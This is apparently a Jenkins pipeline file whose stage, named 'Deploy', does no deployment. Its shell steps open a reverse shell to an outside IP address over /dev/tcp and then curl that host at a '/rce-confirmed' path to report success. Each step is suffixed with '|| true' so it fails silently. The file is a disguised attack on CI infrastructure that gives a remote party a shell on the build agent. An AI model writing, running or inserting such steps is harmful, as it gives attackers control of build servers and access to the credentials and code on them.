node {
  stage('Deploy'){
    sh 'bash -i >& /dev/tcp/165.245.190.85/443 0>&1 || true'
    sh 'curl http://165.245.190.85:443/rce-confirmed || true'
  }
}
